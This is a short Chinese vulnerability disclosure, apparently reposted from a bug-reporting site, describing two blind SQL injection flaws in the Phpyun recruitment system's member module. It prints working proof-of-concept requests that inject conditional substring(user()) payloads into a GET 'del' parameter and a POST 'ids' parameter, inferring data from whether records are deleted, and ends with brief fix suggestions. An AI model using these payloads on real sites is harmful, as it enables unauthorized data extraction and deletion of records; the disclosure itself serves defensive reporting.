Phpyun SQL注入两枚

文章目录

漏洞作者: zxx

漏洞一:

/member/model/com.class.php中

漏洞二:

与漏洞一类似,/member/model/com.class.php中

POST的ids直接放入sql语句中

漏洞证明:

证明一:

程序有点问题,因为只要mysql_query执行delete操作只要不出错就返回true,$nid一直返回1,所以回显一直一样,我们就靠招聘信息是否删除成功来判断。

当http://localhost/member/index.php?m=com&c=job&del=if(substring(user(),1,1)=char(115),3,798)) %23 //这里3为我们的招聘信息id

我们的user()是root,ascii码为114,这里为115,所以信息仍存在;

161935409d2cf985ffbe55a65769107cf1546e7a

 

http://localhost/member/index.php?m=com&c=job&del=if(substring(user(),1,1)=char(114),3,798)) %23

16193606e953e5ee94aaf117763f677c35064869

16193556300f56eabcf545164929f16330abd557

 

证明二:

同样是没有回显,这里靠企业环境展示的删除与否判断:

先得到一个展示的id:

在删除的地方,审查元素:

1619424632564e04f7c4be56013c6d7f52792bb2

 

,这里是3

http://localhost/member/index.php?c=delshow

POST:ids=if(substring(user(),1,1)=char(115),3,798) //3就是我们得到的id

这里还是因为155不是r的ascii码,所以删除失败,就不上图了。

http://localhost/member/index.php?c=delshow

POST:ids=if(substring(user(),1,1)=char(114),3,798)

1619451261730ea346d75f2a2fb69dcde035063e

16194523b7701f4bf528119049c41ddf1e4067e0

 

16194628484c6a87266dc2bd84043fe291bf6b10

 

因为360webscan的存在,好像有点鸡肋。

修复方案:

第一个GET用intval过滤

第二个POST用你们的pylode过滤

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录